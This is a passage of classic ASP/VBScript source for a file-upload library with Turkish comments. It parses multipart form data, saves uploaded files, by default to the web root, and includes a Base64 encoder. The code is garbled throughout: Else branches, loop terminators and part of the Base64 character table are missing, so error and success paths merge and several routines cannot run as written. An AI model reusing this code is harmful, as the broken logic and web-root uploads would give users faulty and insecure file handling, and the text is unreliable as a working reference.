vValue = mid(sPostStr, j)
vValue = mid(sPostStr, j, i - j)
End If

Dim uploadcontrol
Set uploadcontrol = createobject("Scripting.Dictionary")
uploadcontrol.add "Value", vValue

If not uploadrequest.exists(sName) Then
uploadrequest.add sName, uploadcontrol
Set tmphash = uploadrequest(sName)
tmphash("Value") = tmphash("Value") & ", " & vValue
Set uploadrequest(sName) = tmphash
End If
End Sub

Public Sub BuildUploadRequest(byref RequestBin, byref UploadRequest)
dim PosBeg, PosEnd, boundary, boundaryPos, Pos, Name, PosFile
dim PosBound, FileName, ContentType, Value, sEncType, sReqMeth
dim tmphash, isfile

If lenb(RequestBin) = 0 Then
exit sub
End If

PosBeg = 1
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))

If posend = 0 Then
BuildUploadRequest_ASCII getString(requestbin), UploadRequest
Exit Sub
End If

boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
boundaryPos = InstrB(1,RequestBin,boundary)
Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--")))
Dim UploadControl
Set UploadControl = Server.CreateObject("Scripting.Dictionary")
Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition"))
Pos = InstrB(Pos,RequestBin,getByteString("name="))
PosBeg = Pos+6
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename="))
PosBound = InstrB(PosEnd,RequestBin,boundary)

isfile = false

If PosFile<>0 AND (PosFile<PosBound) Then
PosBeg = PosFile + 10
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
UploadControl.Add "FileName", FileName
Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:"))
PosBeg = Pos+14
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
UploadControl.Add "ContentType",ContentType
PosBeg = PosEnd+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg)

isfile = true
Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
PosBeg = Pos+4
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))

isfile = false
End If
UploadControl.Add "Value" , Value
UploadControl.Add "InputName", Name
If not uploadrequest.exists(name) Then
UploadRequest.Add name, UploadControl
If not isfile Then
Set tmphash = uploadrequest(name)
tmphash("Value") = tmphash("Value") & ", " & Value
Set uploadrequest(name) = tmphash
End If
End If

End Sub
End Class

Class FO_File
Public bSuccess
Public sAbsPath
Public sVirPath
Public sStdErr
Public sCType
Public frmInputName
Public binValue
Private hBtCt, sURiPath, sFiExt
private sfinme

Private oProps

Public property let sFileName(byval filenameinput)
sFiExt = right(filenameinput, len(filenameinput) - instrrev(filenameinput, "."))
sfinme = filenameinput
end property

public property get sFileName()
sFileName = sfinme
end property

Private Sub Class_Initialize()
bSuccess = false
sAbsPath = ""
sVirPath = ""
sStdErr = ""
hBtCt = 0
sCType = ""
sFileName = ""
binValue = ""
sURiPath = ""
End Sub

Public Sub SetCurrentProperties(byref oPropertybag)
Set oProps = oPropertybag
End Sub

Public Sub SaveAsRecord(byref oField)
sAbsPath = ""
sVirPath = ""
sURiPath = ""
bSuccess = false

If LenB(binValue) = 0 Then
Exit Sub
End If

If IsObject(oField) Then
On Error Resume Next
oField.AppendChunk binValue
If Err Then
sStdErr = Err.Description
bBtCt = 0
bSuccess = false
Exit Sub
End If
On Error GoTo 0

hBtCt = lenb(binValue)
bSuccess = true
End If
End Sub

Public Sub SaveAsFile()
If sStdErr <> "" Then
exit sub
End If
WriteUploadFile oProps.uploaddirectory & "\" & sFileName, binValue
End Sub

Public Function SaveAsBinaryString()
If LenB(binValue) = 0 Then
bBtCt = 0
bSuccess = false
Exit Function
End If

If oProps.UploadDisabled Then
bBtCt = 0
bSuccess = false
sStdErr = "Y?kleme Sayfa Y?netimi Tarafndan Engellendi"
Exit Function
End If

SaveAsBinaryString = binValue
hBtCt = lenb(binValue)
bSuccess = true
End Function

Public Function SaveAsString()
Dim outstr, i

If LenB(binValue) = 0 Then
bBtCt = 0
bSuccess = false
Exit Function
End If

If oProps.UploadDisabled Then
bBtCt = 0
bSuccess = false
sStdErr = "Y?kleme Sayfa Y?netimi Tarafndan Engellendi"
Exit Function
End If

outstr = ""
For i = 1 to LenB( binValue )
outstr = outstr & chr( AscB( MidB( binValue, i, 1) ) )
SaveAsString = outstr
hBtCt = lenb(binValue)
bSuccess = true
End Function

Public Function SaveAsBase64EncodedStr()
Dim outstr, oEnc

If LenB(binValue) = 0 Then
bBtCt = 0
bSuccess = false
Exit Function
End If

If oProps.UploadDisabled Then
bBtCt = 0
bSuccess = false
sStdErr = "Y?kleme Sayfa Y?netimi Tarafndan Engellendi"
Exit Function
End If
Set oEnc = New Base64Encoder
outstr = oEnc.EncodeStr(binValue)
Set oEnc = Nothing
SaveAsBase64EncodedStr = outstr
hBtCt = lenb(binValue)
bSuccess = true
End Function

Private Sub WriteUploadFile(byVal NAME, byVal CONTENTS)
dim ScriptObject, i, NewFile

on error resume next

Set ScriptObject = Server.CreateObject("Scripting.FileSystemObject")
Set NewFile = ScriptObject.CreateTextFile( NAME )
For i = 1 to LenB( CONTENTS )
NewFile.Write chr( AscB( MidB( CONTENTS, i, 1) ) )
Set NewFile = Nothing
Set ScriptObject = Nothing

If err.number <> 0 Then
sStdErr = Err.Description
bSuccess = false
sAbsPath = NAME
sVirPath = UnMappath(NAME)
hBtCt = lenb(CONTENTS)
sURiPath = "http://" & Request.ServerVariables("HTTP_HOST") & sVirPath
bSuccess = true
End If
on error goto 0
End Sub

Private Function UnMappath(byVal pathname)
dim tmp, strRoot

strRoot = Server.Mappath("/")
tmp = replace( lcase( pathname ), lcase( strRoot ), "" )
tmp = replace( tmp, "\", "/" )
UnMappath = tmp
End Function

Public Property Get ContentType()
ContentType = sCType
End Property

Public Property Let FileName(byval newfilename)
Dim oFileChk
Set oFileChk = New FO_FileChecker
oFileChk.SetCurrentProperties oProps
oFileChk.FileInput_NamePath = newfilename
If oFileChk.IllegalCharsFound Then
sStdErr = "Dosya i?erisinde ge?ersiz karakterler bulundu"
bSuccess = false
Set oFileChk = Nothing
Exit Property
End If
If oFileChk.FileNameBadOrExists Then
sStdErr = "Dosya ismi ge?ersiz ya da bu dosyadan zaten mevcut ve ?st?ne yazma engellenmi"
bSuccess = false
Set oFileChk = Nothing
Exit Property
End If

Set oFileChk = Nothing

sStdErr = ""
sFileName = newfilename
End Property

Public Function GetFileNameFromFilePath(ByVal filewithpath)
dim fileend

fileend = instrrev(filewithpath, "\")
GetFileNameFromFilePath = right(filewithpath, len(filewithpath) - fileend)
End Function

Public Property Get FileName()
FileName = sFileName
End Property

Public Property Get UploadSuccessful()
UploadSuccessful = bSuccess
End Property

Public Property Get AbsolutePath()
AbsolutePath = sAbsPath
End Property

Public Property Get URLPath()
URLPath = sURiPath
End Property

Public Property Get VirtualPath()
VirtualPath = sVirPath
End Property

Public Property Get ErrorMessage()
ErrorMessage = sStdErr
End Property

Public Property Get ByteCount()
ByteCount = hBtCt
End Property
End Class

Class FO_Properties
Private sErrHead
Private sErrMsg
Private arrExt

Private strUploadDir
Private boolAllowOverwrite
Private lngUploadSize
Private bMin
Private bByPass

Private Sub Class_Initialize()
sErrHead = "Yanl Kurulum Hatas"
sErrMsg = ""
strUploadDir = Server.Mappath("/")
boolAllowOverwrite = false
bByPass = false
End Sub

Public Sub ResetAll()
End Sub

Public Property LET UploadDirectory(byVal strInput)
Dim oFSO, bDoesntExist

bDoesntExist = false

If instr(strInput, "/") <> 0 Then
strInput = ""
Err.Raise 21342, sErrHead, _
"Veri yolu tam olarak girilmeli."
exit property
End If

Set oFSO = CreateObject("Scripting.FileSystemObject")
If not oFSO.FolderExists(strInput) Then bDoesntExist = true
Set oFSO = Nothing
If bDoesntExist Then
Err.Raise 21343, sErrHead, "HATA - """ & _
strInput & """ Bu dosya serverda bulunmamaktadr."
Exit Property
End If

strUploadDir = strInput
End Property

Public Property LET AllowOverWrite(byVal boolInput)
on error resume next
boolInput = cbool(boolInput)
on error goto 0
boolAllowOverwrite = boolInput
End Property

Public Property GET UploadDirectory()
UploadDirectory = strUploadDir
End Property

Public Property GET AllowOverWrite()
AllowOverWrite = boolAllowOverwrite
End Property

End Class

'Base64 kod ifreleyici class

Class Base64Encoder
Private Base64Chars

Private Sub Class_Initialize()
"abcdefghijklmnopqrstuvwxyz" & _
"0123456789" & _
End Sub

Public Function EncodeStr(byVal strIn)
Dim c1, c2, c3, w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 3
c1 = Asc(Mid(strIn, n, 1))
c2 = Asc(Mid(strIn, n + 1, 1) + Chr(0))
c3 = Asc(Mid(strIn, n + 2, 1) + Chr(0))
w1 = Int(c1 / 4) : w2 = (c1 And 3) * 16 + Int(c2 / 16)
If Len(strIn) >= n + 1 Then
w3 = (c2 And 15) * 4 + Int(c3 / 64)
w3 = -1
End If
If Len(strIn) >= n + 2 Then
w4 = c3 And 63
w4 = -1
End If
strOut = strOut + mimeencode(w1) + mimeencode(w2) + _
mimeencode(w3) + mimeencode(w4)
EncodeStr = strOut
End Function

Private Function mimedecode(byVal strIn)
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function

Public Function DecodeStr(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If w2 >= 0 Then _
strOut = strOut + _
Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If w3 >= 0 Then _
strOut = strOut + _
Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If w4 >= 0 Then _
strOut = strOut + _
Chr(((w3 * 64 + w4) And 255))
DecodeStr = strOut
End Function

Private Function mimeencode(byVal intIn)
If intIn >= 0 Then
mimeencode = Mid(Base64Chars, intIn + 1, 1)
mimeencode = ""
End If
End Function
End Class
'Upload Snflar Biti%>

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